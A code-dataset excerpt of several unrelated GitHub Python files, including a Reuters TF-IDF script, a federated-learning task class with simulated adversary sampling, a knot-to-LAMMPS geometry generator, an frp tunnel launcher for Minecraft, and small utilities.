\"\"\"create a dictionary of topics to list doc_ids by going through reuters corpus\"\"\"\n\n corpus_filename = config.CORPUS[config.REUTERS]['corpusxml']\n topic_dict = dict()\n all_doc_ids = []\n with open(corpus_filename, 'rb') as f:\n data = f.read()\n soup = bs4.BeautifulSoup(data, 'html.parser')\n articles = soup.findAll(\"article\")\n for article in articles:\n doc_id = article.find(\"doc_id\").text\n all_doc_ids.append(doc_id)\n topics = article.find(\"topics\").text.strip().split(' ')\n #some articles have multiple topics\n for topic in topics:\n if topic in topic_dict:\n doc_list = topic_dict.get(topic)\n doc_list.append(doc_id)\n topic_dict[topic] = doc_list\n else:\n topic_dict[topic] = [doc_id]\n topic_dict['all-topics'] = list(set(all_doc_ids))\n topic_dict['notopic'] = topic_dict.pop('')\n write_topics_tocsv(topic_dict)\n\ndef write_topics_tocsv(topics):\n \"\"\"write the topic file to csv\"\"\"\n csv_filename = config.CORPUS[config.REUTERS]['doc_by_topic']\n with open(csv_filename, 'w') as file:\n writer = csv.writer(file)\n for key, value in topics.items():\n writer.writerow([key, value])\n\ndef read_topics_from_csv():\n \"\"\"Read in the csv file that stores the topic info for a corpus\"\"\"\n filename = config.CORPUS[config.REUTERS]['doc_by_topic']\n topic_dict = dict()\n if os.path.exists(filename):\n print('reading from topics csv')\n with open(filename, newline='') as data_file:\n reader = csv.reader(data_file)\n for row in reader:\n topic_dict[row[0]] = ast.literal_eval(row[1])\n return topic_dict\n\n return {}\n\ndef get_topic_dict():\n \"\"\"Wrapper 
to avoid multiple dictionary reads from csv.\"\"\"\n global TOPIC_DICT\n if TOPIC_DICT:\n return TOPIC_DICT\n TOPIC_DICT = read_topics_from_csv()\n return TOPIC_DICT\n\ncachedStopWords = stopwords.words(\"english\")\n\n#code below is from\n#https://miguelmalvarez.com/2015/03/20/classifying-reuters-21578-collection-with-python-representing-the-data/\ndef tokenize(text):\n\tmin_length = 3\n\twords = map(lambda word: word.lower(), word_tokenize(text))\n\twords = [word for word in words\n if word not in cachedStopWords]\n\ttokens =(list(map(lambda token: PorterStemmer().stem(token),\n words)));\n\tp = re.compile('[a-zA-Z]+')\n\tfiltered_tokens = list(filter(lambda token:\n p.match(token) and len(token)>=min_length,tokens))\n\treturn filtered_tokens\n\ndef tf_idf(docs):\n\ttfidf = TfidfVectorizer(tokenizer=tokenize, min_df=3,\n max_df=0.90, max_features=3000,\n use_idf=True, sublinear_tf=True,\n norm='l2')\n\ttfidf.fit(docs)\n\treturn tfidf\n\ndef feature_values(doc, representer):\n\tdoc_representation = representer.transform([doc])\n\tfeatures = representer.get_feature_names()\n\treturn [(features[index], doc_representation[0, index])\n for index in doc_representation.nonzero()[1]]\n\ndef main():\n\ttrain_docs = []\n\ttest_docs = []\n\n\tfor doc_id in reuters.fileids():\n\t\tif doc_id.startswith(\"train\"):\n\t\t\ttrain_docs.append(reuters.raw(doc_id))\n\t\telse:\n\t\t\ttest_docs.append(reuters.raw(doc_id))\n\n\trepresenter = tf_idf(train_docs);\n\n\tfor doc in test_docs[:15]:\n\t print(doc_id)\n\t print(feature_values(doc, representer))\n\nif __name__ == '__main__':\n main()\n","repo_name":"tmayn062/CSI4107Search","sub_path":"text_categorization.py","file_name":"text_categorization.py","file_ext":"py","file_size_in_byte":4346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30856353478","text":"\ndef commonChild(s1, s2):\n m, n = len(s1), len(s2)\n prev, cur = [0]*(n+1), [0]*(n+1)\n for i in range(1, m+1):\n for j in range(1, n+1):\n if s1[i-1] == s2[j-1]:\n cur[j] = 1 + prev[j-1]\n else:\n if cur[j-1] > prev[j]:\n cur[j] = cur[j-1]\n else:\n cur[j] = prev[j]\n cur, prev = prev, cur\n return prev[n]\n\n\n# Te traag:\n# def commonChild(s1, s2):\n# matrix = [[\"\" for x in range(len(s2))] for x in range(len(s1))]\n# for i in range(len(s1)):\n# for j in range(len(s2)):\n# if s1[i] == s2[j]:\n# if i == 0 or j == 0:\n# matrix[i][j] = s1[i]\n# else:\n# matrix[i][j] = matrix[i-1][j-1] + s1[i]\n# else:\n# matrix[i][j] = max(matrix[i-1][j], matrix[i][j-1], key=len)\n#\n# cs = matrix[-1][-1]\n#\n# # return len(cs), cs\n# return len(cs)\n\n\n\nif __name__ == '__main__':\n s1 = input()\n s2 = input()\n result = commonChild(s1, s2)\n print(result)\n\n\n\"\"\"\nhttps://www.hackerrank.com/challenges/common-child/problem?h_l=interview&playlist_slugs%5B%5D=interview-preparation-kit&playlist_slugs%5B%5D=strings&h_r=next-challenge&h_v=zen\n\nInput:\nWEWOUCUIDGCGTRMEZEPXZFEJWISRSBBSYXAYDFEJJDLEBVHHKS\nFDAGCXGKCTKWNECHMRXZWMLRYUCOCZHJRRJBOAJOQJZZVUYXIC\n\nOutput: 15\n\nInput:\nHARRY\nSALLY\n\nOutput: 2\n\nInput:\nAA\nBB\nOutput: 0\n\nInput:\nSHINCHAN\nNOHARAAA\n\nOutput: 3\n\nInput:\nABCDEF\nFBDAMN\n\nOutput:\n2\n\nWith this you'll find the longest string which is in both strings.\nSo, without deleting any of the letters that both strings have in common:\n\n matcher = difflib.SequenceMatcher(\n None, s1a, s2a)\n match = matcher.find_longest_match(\n 0, len(s1a), 0, len(s2a))\n return 
match.size\n\n\"\"\"","repo_name":"dstada/HackerRank.com","sub_path":"Common Child - Interview prep.py","file_name":"Common Child - Interview prep.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"37671003021","text":"def check_comm(authors):\n try:\n order = [author.get('commOrder', '0') for author in authors if author.get('isComm', False)]\n order.sort()\n\n flag = True\n for i, val in enumerate(order):\n if int(val) != (i + 1):\n flag = False\n\n return flag\n except Exception as e:\n return False\n","repo_name":"PoorKing95/worktest","sub_path":"polls/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72245915001","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mar 25 2023\nauthor: yjianzhu\n\n\"\"\"\nimport os\nimport sys\nimport numpy as np\nimport pandas as pd\n\n# 对core文件夹下的文件进行处理,生成文件名列表\ndef get_file_list(path):\n file_list = []\n for root, dirs, files in os.walk(path):\n for file in files:\n if os.path.splitext(file)[1] == '.txt':\n file_list.append(os.path.join(root, file))\n return file_list\n\n# 读取文件,返回数据,使用pandas\ndef open_file(file):\n # 读取文件中存的矩阵,分隔符为\\t和空格,无表头\n data = pd.read_csv(file, sep='\\s+', header=None)\n #print(data.values.shape)\n return data.values\n\n# 定义生成环形或者开链 unknot 的函数\ndef unknot_generator(length,type):\n # 生成圆形长度为length的坐标\n if type == \"close\":\n data = np.zeros((length, 3))\n radius = length/2/np.pi\n for i in range(length):\n data[i, 0] = np.cos(2 * np.pi * i / length)*radius\n data[i, 1] = np.sin(2 * np.pi * i / length)*radius\n data[i, 2] = 0\n return data\n # 生成开链长度为length的坐标\n elif type == \"open\":\n data = np.zeros((length, 3))\n # 用折线生成开链\n for i in range(length):\n data[i, 0] = 0\n data[i, 1] = 0\n data[i, 2] = i\n return data\n\n\n\n# 定义生成更长纽结的函数,输入data为numpy数组,拓展长度至length\ndef knot_generator(data, length,type=\"open\",mod=\"MC\"):\n \"\"\"生成开链or闭链纽结\"\"\"\n N = data.shape[0]\n\n # 生成开链纽结\n if type == \"open\":\n # 在链前后各添加(length-N)/2个坐标,链前从z轴负方向想data[0]靠近,链后从data[N-1]向z轴正方向靠近\n for i in range(int((length - N) / 2)):\n data = np.insert(data, 0, np.array([0, 0, -1])+data[0,:], axis=0)\n data = np.insert(data, N + 2*i + 1, np.array([0, 0, 1])+data[N+2*i,:], axis=0)\n return data\n # 生成闭链纽结\n elif type == \"close\":\n # 生成旋转矩阵,使得data[-1,:]与z轴正方向重合\n # 平移矩阵,使得data[0,:]与原点重合\n data-=data[0,:]\n\n vec=data[-1,:]\n xvec=vec/np.linalg.norm(vec)\n #找和vec与z轴正方向垂直的旋转轴\n dx = xvec[0]\n dy = xvec[1]\n dz = xvec[2]\n cosa = dz\n sina = np.sqrt(1-cosa*cosa)\n rxy = np.sqrt(dx*dx + dy*dy)\n ux = -dy/rxy\n uy = dx/rxy\n\n R=np.zeros((3,3))\n R[0,0] = cosa + ux * ux * (1-cosa)\n R[0,1] = ux * uy * (1-cosa) \n R[0,2] = uy * sina\n R[1,0] = uy * ux *(1-cosa) \n R[1,1] = cosa + uy*uy*(1-cosa)\n R[1,2] = - ux*sina\n R[2,0] = - uy*sina\n R[2,1] = ux*sina\n R[2,2] = cosa\n\n data=np.dot(data,R)\n \n if(mod==\"MC\"):\n # 在y轴上找一个点,这个点距离data[0,:]和data[-1,:]相等\n if((length-N)%2==0):\n x_0=np.sqrt(((length-N)/2)**2-(data[-1,2]/2-0.5)**2)\n y_0=0\n z_0=0.5+data[-1,2]/2\n\n # 在x0,y0,z0和data[-1,:]的距离输出\n #print(np.linalg.norm(data[-1,:]-np.array([x_0,y_0,z_0])))\n # 在x0,y0,z0和data[-1,:]之间间隔距离1取点\n newv=np.array([x_0,y_0,z_0])-data[-1,:]\n newv=newv/np.linalg.norm(newv)\n\n for i in range(int((length-N)/2)):\n data=np.insert(data,N+i,data[-1,:]+newv,axis=0)\n # 再次在\n z_0=-0.5+data[N-1,2]/2\n newv=np.array([x_0,y_0,z_0])-data[0,:]\n 
newv=newv/np.linalg.norm(newv)\n for i in range(int((length-N)/2)):\n data=np.insert(data,0,data[0,:]+newv,axis=0)\n return data\n else:\n half=(length-N)//2\n x_0=np.sqrt((half+1)**2-(data[-1,2]/2)**2)\n y_0=0\n z_0=data[-1,2]/2\n vec=np.array([x_0,y_0,z_0])-data[-1,:]\n vec=vec/np.linalg.norm(vec)\n for i in range(half):\n data=np.insert(data,N+i,data[-1,:]+vec,axis=0)\n vec=np.array([x_0,y_0,z_0])-data[0,:]\n vec=vec/np.linalg.norm(vec)\n for i in range(half+1):\n data=np.insert(data,0,data[0,:]+vec,axis=0)\n\n return data\n else:\n return \n\n# 定义写入xyz文件的函数\ndef write_xyz(data, filename):\n N = data.shape[0]\n with open(filename, 'w') as f:\n f.write(str(N) + '\\n\\n')\n for i in range(N):\n f.write('1' + '\\t' + str(data[i, 0]) + '\\t' + str(data[i, 1]) + '\\t' + str(data[i, 2]) + '\\n')\n\n# 定义计算相邻两点间距离的函数\ndef distance(data, type=\"open\"):\n if(type==\"open\"):\n N = data.shape[0]\n dis = np.zeros(N-1)\n for i in range(1,N):\n dis[i-1] = np.linalg.norm(data[i, :] - data[i - 1, :])\n return dis\n elif(type==\"close\"):\n N = data.shape[0]\n dis = np.zeros(N)\n for i in range(1,N):\n dis[i-1] = np.linalg.norm(data[i, :] - data[i - 1, :])\n dis[N-1]=np.linalg.norm(data[0,:]-data[N-1,:])\n return dis\n\n# 定义保存为lammps input格式的函数\ndef write_lammps(data,filename,type=\"open\",Lx=200,Ly=200,Lz=200):\n N=data.shape[0]\n with open(filename,'w') as f:\n f.write(\"#LAMMPS input file\\n\")\n f.write('{} atoms\\n'.format(N))\n # 写入bond数目\n if (type==\"open\"):\n f.write('{} bonds\\n'.format(N-1))\n elif(type==\"close\"):\n f.write('{} bonds\\n'.format(N))\n # 写入angle数目\n if (type==\"open\"):\n f.write('{} angles\\n'.format(N-2))\n elif(type==\"close\"):\n f.write('{} angles\\n'.format(N))\n\n # 写入原子类型数目\n f.write('\\n1 atom types\\n')\n # 写入bond类型数目\n f.write('1 bond types\\n')\n # 写入angle类型数目\n f.write('1 angle types\\n')\n\n # 写入box的大小\n min_x=np.min(data[:,0])\n data[:,0] = data[:,0] - min_x\n min_y=np.min(data[:,1])\n data[:,1] = data[:,1] - min_y\n min_z=np.min(data[:,2])\n data[:,2] = data[:,2] - min_z\n f.write('\\n0.0 {} xlo xhi\\n'.format(max(Lx,np.max(data[:,0]))))\n f.write('0.0 {} ylo yhi\\n'.format(max(Ly,np.max(data[:,1]))))\n f.write('0.0 {} zlo zhi\\n'.format(max(Lz,np.max(data[:,2]))))\n\n # 写入质量\n f.write('\\nMasses\\n\\n1 1.0\\n')\n\n # 写入原子坐标\n f.write('\\nAtoms\\n\\n')\n for i in range(N):\n f.write('{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n'.format(i+1,1,1,data[i,0],data[i,1],data[i,2]))\n # 写入bond信息\n f.write('\\nBonds\\n\\n')\n if (type==\"open\"):\n for i in range(N-1):\n f.write('{}\\t{}\\t{}\\t{}\\n'.format(i+1,1,i+1,i+2))\n elif(type==\"close\"):\n for i in range(N-1):\n f.write('{}\\t{}\\t{}\\t{}\\n'.format(i+1,1,i+1,i+2))\n f.write('{}\\t{}\\t{}\\t{}\\n'.format(N,1,N,1))\n # 写入angle信息\n f.write('\\nAngles\\n\\n')\n if (type==\"open\"):\n for i in range(N-2):\n f.write('{}\\t{}\\t{}\\t{}\\t{}\\n'.format(i+1,1,i+1,i+2,i+3))\n elif(type==\"close\"):\n for i in range(N-2):\n f.write('{}\\t{}\\t{}\\t{}\\t{}\\n'.format(i+1,1,i+1,i+2,i+3))\n f.write('{}\\t{}\\t{}\\t{}\\t{}\\n'.format(N-1,1,N-1,N,1))\n f.write('{}\\t{}\\t{}\\t{}\\t{}\\n'.format(N,1,N,1,2))\n\n# 定义读取xyz文件的函数\ndef read_xyz(filename):\n with open(filename,'r') as f:\n N=int(f.readline())\n f.readline()\n data=np.zeros((N,3))\n for i in range(N):\n line=f.readline().split()\n data[i,0]=float(line[1])\n data[i,1]=float(line[2])\n data[i,2]=float(line[3])\n return data\n\n\nif __name__ == '__main__':\n data = unknot_generator(300,type=\"close\")\n dis = distance(data,type=\"close\")\n print(max(dis),min(dis),np.mean(dis))\n 
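# Sanity check (editorial comment): adjacent beads on the generated circle sit 2*R*sin(pi/N) apart with R = N/(2*pi), so the max/min/mean printed above should all be close to 1.0 before the LAMMPS data file is written.\n    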
write_lammps(data,\"unknot_L300_close.data\",type=\"close\")\n # knot_cores=get_file_list(\"core\")\n # types=\"close\"\n # Lknot=300\n\n # for knot in knot_cores:\n # data=open_file(knot)\n # data=knot_generator(data,Lknot,types)\n # # 从文件名中提取纽结类型\n # knot_type=knot.split(\"_\")[1]\n # knot_type=knot_type.split(\".\")[0]\n # write_lammps(data,\"lammps/{}_L{}_{}.data\".format(knot_type,data.shape[0],types),type=types)","repo_name":"yjianzhu/knot-generator","sub_path":"src/knot_generator.py","file_name":"knot_generator.py","file_ext":"py","file_size_in_byte":8725,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"10994259656","text":"\"\"\"\nOnline status\n=============\nThe module that provides functionality for online status checking.\n\"\"\"\nfrom utils.redishelper import REDIS_HELPER\n\n\nclass OnlineStatusMiddleware(): # pylint: disable=too-few-public-methods\n \"\"\"\n The class that represents logic for setting user id in redis db\n \"\"\"\n\n def __init__(self, get_response):\n \"\"\"Constructor method that creates middleware instance.\"\"\"\n\n self.get_response = get_response\n\n def __call__(self, request):\n \"\"\"\n Method that makes middleware instance callable and implements setting user id in redis db\n \"\"\"\n user = request.user\n if user.is_authenticated():\n REDIS_HELPER.set(user.id, user.email)\n response = self.get_response(request)\n return response\n","repo_name":"lv275python/eventually.api","sub_path":"eventually/middlewares/onlinestatus.py","file_name":"onlinestatus.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"40"} +{"seq_id":"31120820833","text":"caminho_arquivo_inexistente = '03-arquivo-inexistente.txt'\ncaminho_arquivo_existente = '03-exercicio-leitura-notas.txt'\ncaminho_arquivo_pessoas_reprovadas = '03-exercicio-pessoas_reprovadas.txt'\n\ndef carregar_arquivos_notas(caminho_arquivo):\n pessoas = []\n \n try:\n with open(caminho_arquivo) as conteudo:\n pessoas = conteudo.readlines()\n except FileNotFoundError:\n print(f\":: ERROR :: Não foi possível encontrar o arquivo: {caminho_arquivo}\")\n return None\n \n return pessoas\n\ndef escrever_arquivo(caminho, conteudo):\n try:\n with open(caminho, 'w') as arquivo:\n arquivo.writelines(conteudo)\n except:\n print(f\":: ERROR :: Arquivo {caminho} não pode ser salvo!\")\n return\n \n print(f\"Arquivo {caminho} salvo com sucesso!\")\n\n\ndef filtro_pessoas_reprovadas(pessoas):\n if pessoas == None:\n raise ValueError(\"Lista de pessoas esta vazia\")\n\n pessoas_reprovadas = []\n for pessoa in pessoas:\n nome, nota = pessoa.replace(\"\\n\", \"\").split(\" \")\n if int(nota) < 6:\n pessoas_reprovadas.append(nome + \"\\n\")\n \n return pessoas_reprovadas\n\ndef processar_pessoas_reprovadas(caminho_arquivo):\n try:\n notas1 = carregar_arquivos_notas(caminho_arquivo)\n pessoas_reprovadas1 = filtro_pessoas_reprovadas(notas1)\n escrever_arquivo(caminho_arquivo_pessoas_reprovadas, pessoas_reprovadas1) \n except ValueError as error_message:\n print(f\"{error_message}\")\n \n print(\"\")\n\nprocessar_pessoas_reprovadas(caminho_arquivo_inexistente)\nprocessar_pessoas_reprovadas(caminho_arquivo_existente)\nprint(\"Fim!\", 
end=\"\\n\")\n","repo_name":"UelioNobre/testes-com-python","sub_path":"02-entrada-e-saida-de-dados/03-exercicio-leitura-notas.py","file_name":"03-exercicio-leitura-notas.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7189687664","text":"\"\"\"\n@author: Julian Sobott\n@created: 18.12.2018\n@brief:\n@description:\n\n@external_use:\n\n@internal_use:\n\n\"\"\"\nimport sys\nimport subprocess\n\nfrom Logging import logger\nimport Paths\n\nfrom CMD import intersects, get_optional_parameter\n\n\nDESCRIPTION = (\n \"\\n\"\n \"Custom.py Init:\\n\"\n \"This script makes it possible to use custom scripts.\\n\"\n \"Add your functionality to your Custom.py file.\\n\"\n \"Append your additional arguments to this call.\\n\"\n \"Only {additional_args} are forwarded to the custom script.\\n\"\n \" req -c {additional_args}\"\n \"\\n\"\n )\n\n\ndef handle_sys_arguments(all_args):\n help_arg = [\"--help\", \"-h\", \"?\"]\n if intersects(help_arg, all_args) or len(all_args) <= 1:\n print_help()\n exit(0)\n\n custom_args = [Paths.Website.ABS_CUSTOM_SCRIPT_PATH]\n custom_args += all_args[1:]\n subprocess.run(custom_args, shell=True)\n\n\ndef print_help():\n print(DESCRIPTION)\n\n\nif __name__ == \"__main__\":\n p_num_args = len(sys.argv) - 1\n p_all_args = []\n if p_num_args > 0:\n p_all_args = sys.argv[1:]\n handle_sys_arguments(p_all_args)\n","repo_name":"JulianSobott/Website_creator","sub_path":"scripts/Custom.py","file_name":"Custom.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22652966983","text":"import psutil\r\nimport subprocess\r\nimport os\r\nimport pyperclip\r\nimport random\r\nimport requests\r\n\r\ndef get(url, *args, **kwargs):\r\n try:\r\n return requests.get(url, *args, **kwargs)\r\n except Exception as e:\r\n print('请求失败: {}'.format(e))\r\n return None\r\n\r\nprint('公告信息')\r\nprint('--------------------------------------------------------')\r\nurl = 'http://api.lmbaka.top:114/frp/information'\r\nresponse = get(url)\r\nif response and response.status_code == 200:\r\n print(response.text)\r\nelse:\r\n print('请求失败,无法获取公告信息')\r\nprint('--------------------------------------------------------')\r\nprint('正在寻找Minecraft开放的端口...')\r\ndef get_open_ports():\r\n all_processes = psutil.process_iter()\r\n open_ports = set() # 集合存端口\r\n\r\n for process in all_processes:\r\n try:\r\n if process.name() == \"javaw.exe\":\r\n process_connections = process.connections()\r\n\r\n for conn in process_connections:\r\n if conn.status == 'LISTEN':\r\n open_ports.add(conn.laddr.port) # 防重\r\n\r\n except (psutil.Error, psutil.NoSuchProcess):\r\n pass\r\n\r\n return open_ports\r\n\r\ndef input_port(desc: str, error_desc: str, start: int=0, end: int=65535):\r\n while (True):\r\n try:\r\n port = int(input(desc))\r\n if not (start <= port <= end):\r\n print(error_desc)\r\n continue\r\n return port\r\n except ValueError: # 输入内容无法转为 int\r\n print(error_desc)\r\n continue\r\n\r\ndef start_frpc(minecraft_port, external_port):\r\n # 清除 frpc.ini 文件内容\r\n with open(\"frpc.ini\", mode=\"w\") as f:\r\n f.write(\"[common]\\n\")\r\n f.write(\"server_addr = gyfrp.lmbaka.top\\n\")\r\n f.write(\"server_port = 54001\\n\")\r\n\r\n name = \"tunnel\" + str(os.urandom(4).hex().upper())\r\n\r\n # 构建 frpc.ini 配置文件内容\r\n frpc_ini = f\"\"\"[tunnel_{name}]\r\ntype = tcp\r\nlocal_ip = 127.0.0.1\r\nlocal_port = 
{minecraft_port}\r\nremote_port = {external_port}\r\n\"\"\"\r\n\r\n    with open(\"frpc.ini\", mode=\"a\") as f:\r\n        f.write(frpc_ini)\r\n\r\n    # Start frpc\r\n    frpc_process = subprocess.Popen(\r\n        [\"frpc\", \"-c\", \"frpc.ini\"],\r\n        stdout=subprocess.PIPE,\r\n        stderr=subprocess.STDOUT\r\n    )\r\n    target_address = f\"frp.lmbaka.top:{external_port}\"\r\n    print('__________________________________________________________')\r\n    print('IP: '+target_address+' copied to the clipboard')\r\n    print(f\"Use frp.lmbaka.top:{external_port} to join the room\")\r\n    pyperclip.copy(target_address)\r\n    # Stream frpc's log output to the console\r\n    for line in iter(frpc_process.stdout.readline, b''):\r\n        print(line.decode('utf-8').strip())\r\n\r\n\r\nopen_ports = get_open_ports()\r\n\r\nif len(open_ports) == 1:\r\n    for port in open_ports:\r\n        print('Detected open Minecraft port: '+str(port))\r\n    ranport = random.randint(54000, 55000)\r\n    start_frpc(port, ranport)\r\nelse:\r\n    print(\"No open Minecraft port found (or several candidates); please enter the ports manually\")\r\n    minecraft_port = input_port(\"Enter the Minecraft port number: \", \"Invalid port number, please try again\")\r\n    external_port = input_port(\"Enter the external port number, an integer between 54000 and 55000: \", \"Invalid port number, please try again\", 54000, 55000)\r\n    start_frpc(minecraft_port, external_port)  # use the external port the user just chose instead of discarding it\r\n","repo_name":"Lmbaka/McFrp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"28461021461","text":"# @Author: Varoon Pazhyanur \n# @Date: 15-08-2017\n# @Filename: mouse_events.py\n# @Last modified by: varoon\n# @Last modified time: 15-08-2017\n\n\n\nimport cv2\nimport numpy\n\n# Mouse handler: draw a filled circle where the user double-clicks\ndef draw_circle(event, x,y, flags, param):\n    if(event==cv2.EVENT_LBUTTONDBLCLK):\n        cv2.circle(image, (x,y),100,(255,255,0),-1)\n# make black image (uint8 is the dtype cv2.imshow expects)\nimage = numpy.zeros((512,512,3),numpy.uint8)\ncv2.namedWindow(\"WINDOW NAME\")\ncv2.setMouseCallback('WINDOW NAME', draw_circle)\nwhile(True):\n    cv2.imshow('WINDOW NAME', image)\n    if(cv2.waitKey(20) & 0xFF==27):  # Esc exits the loop\n        break\ncv2.destroyAllWindows()\n","repo_name":"varoonp123/Learning_OpenCV","sub_path":"mouse_events.py","file_name":"mouse_events.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"22279148511","text":"import math\nimport random\nfrom copy import deepcopy\nfrom typing import List, Any, Dict\n\nfrom metrics.accuracy_metric import AccuracyMetric\nfrom metrics.test_loss_metric import TestLossMetric\nfrom tasks.fl.fl_user import FLUser\nimport torch\nimport logging\nfrom torch.nn import Module\n\nfrom tasks.task import Task\nlogger = logging.getLogger('logger')\n\n\nclass FederatedLearningTask(Task):\n    fl_train_loaders: List[Any] = None\n    ignored_weights = ['num_batches_tracked']#['tracked', 'running']\n    adversaries: List[int] = None\n\n    def init_task(self):\n        self.load_data()\n        self.model = self.build_model()\n        self.resume_model()\n        self.model = self.model.to(self.params.device)\n\n        self.local_model = self.build_model().to(self.params.device)\n        self.criterion = self.make_criterion()\n        self.adversaries = self.sample_adversaries()\n\n        self.metrics = [AccuracyMetric(), TestLossMetric(self.criterion)]\n        self.set_input_shape()\n        return\n\n    def get_empty_accumulator(self):\n        weight_accumulator = dict()\n        for name, data in self.model.state_dict().items():\n            weight_accumulator[name] = torch.zeros_like(data)\n        return weight_accumulator\n\n    def sample_users_for_round(self, epoch) -> List[FLUser]:\n        sampled_ids = 
random.sample(\n range(self.params.fl_total_participants),\n self.params.fl_no_models)\n sampled_users = []\n for pos, user_id in enumerate(sampled_ids):\n train_loader = self.fl_train_loaders[user_id]\n compromised = self.check_user_compromised(epoch, pos, user_id)\n user = FLUser(user_id, compromised=compromised,\n train_loader=train_loader)\n sampled_users.append(user)\n\n return sampled_users\n\n def check_user_compromised(self, epoch, pos, user_id):\n \"\"\"Check if the sampled user is compromised for the attack.\n\n If single_epoch_attack is defined (eg not None) then ignore\n :param epoch:\n :param pos:\n :param user_id:\n :return:\n \"\"\"\n compromised = False\n if self.params.fl_single_epoch_attack is not None:\n if epoch == self.params.fl_single_epoch_attack:\n if pos < self.params.fl_number_of_adversaries:\n compromised = True\n logger.warning(f'Attacking once at epoch {epoch}. Compromised'\n f' user: {user_id}.')\n else:\n compromised = user_id in self.adversaries\n return compromised\n\n def sample_adversaries(self) -> List[int]:\n adversaries_ids = []\n if self.params.fl_number_of_adversaries == 0:\n logger.warning(f'Running vanilla FL, no attack.')\n elif self.params.fl_single_epoch_attack is None:\n adversaries_ids = random.sample(\n range(self.params.fl_total_participants),\n self.params.fl_number_of_adversaries)\n logger.warning(f'Attacking over multiple epochs with following '\n f'users compromised: {adversaries_ids}.')\n else:\n logger.warning(f'Attack only on epoch: '\n f'{self.params.fl_single_epoch_attack} with '\n f'{self.params.fl_number_of_adversaries} compromised'\n f' users.')\n\n return adversaries_ids\n def get_model_optimizer(self, model):\n local_model = deepcopy(model)\n local_model = local_model.to(self.params.device)\n\n optimizer = self.make_optimizer(local_model)\n\n return local_model, optimizer\n\n def copy_params(self, global_model, local_model):\n local_state = local_model.state_dict()\n for name, param in global_model.state_dict().items():\n if name in local_state and name not in self.ignored_weights:\n local_state[name].copy_(param)\n\n def get_fl_update(self, local_model, global_model) -> Dict[str, torch.Tensor]:\n local_update = dict()\n for name, data in local_model.state_dict().items():\n if self.check_ignored_weights(name):\n continue\n local_update[name] = (data - global_model.state_dict()[name])\n\n return local_update\n\n def accumulate_weights(self, weight_accumulator, local_update):\n update_norm = self.get_update_norm(local_update)\n for name, value in local_update.items():\n self.dp_clip(value, update_norm)\n weight_accumulator[name].add_(value)\n\n def update_global_model(self, weight_accumulator, global_model: Module):\n for name, sum_update in weight_accumulator.items():\n if self.check_ignored_weights(name):\n continue\n scale = self.params.fl_eta / self.params.fl_total_participants\n average_update = scale * sum_update\n self.dp_add_noise(average_update)\n model_weight = global_model.state_dict()[name]\n model_weight.add_(average_update)\n\n def dp_clip(self, local_update_tensor: torch.Tensor, update_norm):\n if self.params.fl_diff_privacy and \\\n update_norm > self.params.fl_dp_clip:\n norm_scale = self.params.fl_dp_clip / update_norm\n local_update_tensor.mul_(norm_scale)\n\n def dp_add_noise(self, sum_update_tensor: torch.Tensor):\n if self.params.fl_diff_privacy:\n noised_layer = torch.FloatTensor(sum_update_tensor.shape)\n noised_layer = noised_layer.to(self.params.device)\n noised_layer.normal_(mean=0, 
std=self.params.fl_dp_noise)\n sum_update_tensor.add_(noised_layer)\n\n def get_update_norm(self, local_update):\n squared_sum = 0\n for name, value in local_update.items():\n if self.check_ignored_weights(name):\n continue\n squared_sum += torch.sum(torch.pow(value, 2)).item()\n update_norm = math.sqrt(squared_sum)\n return update_norm\n\n def check_ignored_weights(self, name) -> bool:\n for ignored in self.ignored_weights:\n if ignored in name:\n return True\n\n return False\n","repo_name":"ebagdasa/backdoors101","sub_path":"tasks/fl/fl_task.py","file_name":"fl_task.py","file_ext":"py","file_size_in_byte":6193,"program_lang":"python","lang":"en","doc_type":"code","stars":289,"dataset":"github-code","pt":"40"} +{"seq_id":"14842304577","text":"from setuptools import setup\nimport os\n\n\ndef get_version(path):\n fn = os.path.join(\n os.path.dirname(os.path.abspath(__file__)),\n path, \"__init__.py\")\n with open(fn) as f:\n for line in f:\n if '__version__' in line:\n parts = line.split(\"=\")\n return parts[1].split(\"'\")[1]\n\n\nhere = os.path.abspath(os.path.dirname(__file__))\nREADME = open(os.path.join(here, 'README.rst')).read()\nCHANGELOG = open(os.path.join(here, 'CHANGELOG.rst')).read()\n\n\nsetup(\n name=\"devpi-fallback\",\n description=\"devpi-fallback: Make devpi-server fallback to another index\",\n long_description=README + \"\\n\\n\" + CHANGELOG,\n url=\"https://github.com/msabramo/devpi-fallback\",\n version=get_version(\"devpi_fallback\"),\n maintainer=\"Marc Abramowitz\",\n maintainer_email=\"msabramo@gmail.com\",\n license=\"MIT\",\n classifiers=[\n \"Environment :: Web Environment\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: System Administrators\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python\"] + [\n \"Programming Language :: Python :: %s\" % x\n for x in \"2 3 2.7 3.4\".split()],\n entry_points={\n 'devpi_server': [\n \"devpi-fallback = devpi_fallback.main\"]},\n install_requires=[\n 'devpi-server>=2.0.0'],\n include_package_data=True,\n zip_safe=False,\n 